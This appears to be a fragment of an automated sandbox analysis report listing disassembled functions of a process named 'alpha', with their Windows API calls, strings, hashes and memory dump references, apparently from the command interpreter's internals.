                                                                                                                    • Instruction Fuzzy Hash: E7F1A43270878A8AEB64EF21D8502E9BBB4FF85B99FA04135DA4E47695DF3CE504C710
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BEAA85
                                                                                                                    • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BEAACF
                                                                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF789BEAAEC
                                                                                                                    • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF789BE98C0), ref: 00007FF789BEAB39
                                                                                                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF789BE98C0), ref: 00007FF789BEAB6F
                                                                                                                    • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF789BE98C0), ref: 00007FF789BEABA4
                                                                                                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF789BE98C0), ref: 00007FF789BEABCB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseDeleteValue$CreateOpen
                                                                                                                    • String ID: %s=%s
                                                                                                                    • API String ID: 1019019434-1087296587
                                                                                                                    • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                    • Instruction ID: 7cc0154377eafed44a3019c82537d3ea085a5c8921ade8505735a0b2bfc440cc
                                                                                                                    • Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                                    • Instruction Fuzzy Hash: 04518131B0874A86E760AF65E44476EBEB9FB89F92FA08234CA4D43790DF38D441CB10
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$FullNamePathwcsrchr
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4289998964-0
                                                                                                                    • Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                                                    • Instruction ID: aae943abb93caee7bf7d8eb2a6b25fe7be53a474d6a214296b4737bba2217297
                                                                                                                    • Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
                                                                                                                    • Instruction Fuzzy Hash: CEC19011A0935E82EA94BF91954837DBBB5FF45FA6FA05531CE0E077D0EE3CA491C220
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2221118986-0
                                                                                                                    • Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                                                    • Instruction ID: d4bb1f73b970612e71358c105fbf0c62a92b2d2e6c9fa73d68f0c92f9d912026
                                                                                                                    • Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                                                    • Instruction Fuzzy Hash: 1EC10722A0978A86EB60EF21E854AF9ABB0FF95F59FA44535DA0D47790DF3CD140C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: _wcsicmp
• String ID: GeToken: (%x) '%s'
• API String ID: 2081463915-1994581435
• Opcode ID: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
• Instruction ID: 70fd25d74da47d12fb716eef386bc8dc117f4746264db55345f3ca8141e561f9
• Opcode Fuzzy Hash: fe18cb0ed8500a4f68af4489c4d2b16fbbaa9a87b1c7dbde9da4f66a5e2be525
• Instruction Fuzzy Hash: F1719E24E0C68BC6FBA4BF65E444275AAB0BF40FAAFF40535D50D466A1DF3DA881C720
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: _wcsicmp$iswspacewcschr
• String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
• API String ID: 840959033-3627297882
• Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
• Instruction ID: 4211118bbea2dbb3ad5e21c13c292b0b335293eedc5265c8fa3e386c4432ebdb
• Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
• Instruction Fuzzy Hash: D6D15721E0C64BC6FA54BF21E8592B8AAB0BF45F46FF45035E94E472A5EE2CE405C730
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF789BD3578: _get_osfhandle.MSVCRT ref: 00007FF789BD3584
  • Part of subcall function 00007FF789BD3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD359C
  • Part of subcall function 00007FF789BD3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35C3
  • Part of subcall function 00007FF789BD3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35D9
  • Part of subcall function 00007FF789BD3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD35ED
  • Part of subcall function 00007FF789BD3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF789BC32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF789BD3602
• _get_osfhandle.MSVCRT ref: 00007FF789BC32F3
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF789BC32A4), ref: 00007FF789BC3309
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF789BC3384
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF789BE11DF
Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
• String ID:
• API String ID: 611521582-0
• Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
• Instruction ID: 011e5cb493d8f09fa99c0f6b33819a0f1d203141f79872e10c3efddf03b11205
• Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
• Instruction Fuzzy Hash: 2CA19022B0861686EB14AF61E8542BDFAB1FB89F9AFE44135CD0E47784EF3CD445C620
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: CreateFile_open_osfhandle
• String ID: con
• API String ID: 2905481843-4257191772
• Opcode ID: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
• Instruction ID: 112f27413d1f9d5081d6a331526e7c0725ed7c5c05c77d69bd2ba058dd18133c
• Opcode Fuzzy Hash: bb4e9a8148a0ebbab0b20462a10cedd0498cb3513ed2e56bee41ab165d728bb2
• Instruction Fuzzy Hash: 4871A532A086858AE760AF55E444279FEB0FB89FA2FA44234DA5E427D4DF3DD449CB10
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
• String ID: CSVFS$NTFS$REFS
• API String ID: 3510147486-2605508654
• Opcode ID: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
• Instruction ID: ff350af1ce8a9bb48c6a083615066fc6edcec415700679fdb3c8c517ade62cac
• Opcode Fuzzy Hash: 16da7e415156957614f2e65e2147701ecc6f9267ccedce46241fe4d5de2b202f
• Instruction Fuzzy Hash: 78617F32708BC68AEB659F21D8543E9BBB4FB45B8AF945035DA0D4B758EF38D104C710
Uniqueness

Uniqueness Score: -1.00%

APIs
• longjmp.MSVCRT(?,00000000,00000000,00007FF789BC7279,?,?,?,?,?,00007FF789BCBFA9), ref: 00007FF789BE4485
Strings
Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: longjmp
• String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
• API String ID: 1832741078-366822981
• Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
• Instruction ID: 16fd5e9b91d4a141e45b85494afb12685d7b82db018508fa49dd583c206364c9
• Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
• Instruction Fuzzy Hash: CBC17E60E0C64A85E624BF5691846BCAFB6BF46FAAFF00036DD0D57691CF2CA546C360
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: iswdigit$_errnoiswalphawcschrwcstol
• String ID: +-~!$APerformUnaryOperation: '%c'
• API String ID: 2348642995-441775793
• Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
• Instruction ID: e0ffeab5e23f611bdaec064cabd414c1e91449732b3c622d12e21bab0db80ec3
• Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
• Instruction Fuzzy Hash: A2714C66908A4EC6E7606F25D458179FBB0FB49F86BA4D031FA4E07294EF3CA584C721
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
Similarity
• API ID: Heap$_wcsicmp$AllocProcess
• String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
• API String ID: 3223794493-3086019870
• Opcode ID: cb3c41489134d7bf02aea1d2124d883155d35966149708651120c5f9a30c6a47
• Instruction ID: 7a4f48906e7680afa63cd558767df5f8d03962b7ec9396b60b2650650457d675
• Opcode Fuzzy Hash: cb3c41489134d7bf02aea1d2124d883155d35966149708651120c5f9a30c6a47
• Instruction Fuzzy Hash: D1517025A0874686FA54AF25E414179BFB0FF49FA6FA85135CA1E077A0EF3DE441C720
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                                    • String ID: %s$/-.$:
                                                                                                                    • API String ID: 1644023181-879152773
                                                                                                                    • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                    • Instruction ID: 4764e5d2ba008fde952baebc2dfd97bddb6c85fe70738d9461bcd208d9c46411
                                                                                                                    • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                    • Instruction Fuzzy Hash: 0A91B062A08A4E91EF50AF60D4442BEEBB4FF84F96FE44135DA4E426D4EE3CE545C720
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF789BE7251), ref: 00007FF789BE628E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectSingleWait
                                                                                                                    • String ID: wil
                                                                                                                    • API String ID: 24740636-1589926490
                                                                                                                    • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                    • Instruction ID: d8b0549a18cb4b3e97e94c7229933dc549111150a9124726dece50ec1bbe8ef1
                                                                                                                    • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                    • Instruction Fuzzy Hash: 05414E21A0854AC3F3206F15E40427DAEB5FF85F92FB08131E90A87A94DF3DE844C621
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1397130798-0
                                                                                                                    • Opcode ID: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                                                                                                    • Instruction ID: 34664e6156a1d32c6817267a535a5569741a9a4084b48e267746aadecc976287
                                                                                                                    • Opcode Fuzzy Hash: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                                                                                                    • Instruction Fuzzy Hash: F091A422A09B8A8AEA64AF11D4542B9FBB1FF84F96FE48135D94D47794EF3CD540C320
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD46E
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF789BCD485
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD4EE
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: iswspace.MSVCRT ref: 00007FF789BCD54D
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD569
                                                                                                                      • Part of subcall function 00007FF789BCD3F0: wcschr.MSVCRT ref: 00007FF789BCD58C
                                                                                                                    • iswspace.MSVCRT ref: 00007FF789BD7EEE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                    • String ID: A
                                                                                                                    • API String ID: 3731854180-3554254475
                                                                                                                    • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                    • Instruction ID: a0b601ccd5637211f41bbeaa8fe29e82144f50270297ae409c0137a31fe209b1
                                                                                                                    • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                    • Instruction Fuzzy Hash: 05A18C6190D6868AE660AF61E44427DFBB4FF45F92FA48034DA4E47794EF3CE441DB20
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2005500659.00007FF789BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF789BC0000, based on PE: true
• Associated: 00000006.00000002.2005478527.00007FF789BC0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789BFD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C01000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005566600.00007FF789C0F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2005633976.00007FF789C19000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ff789bc0000_alpha.jbxd
                                                                                                                    Similarity
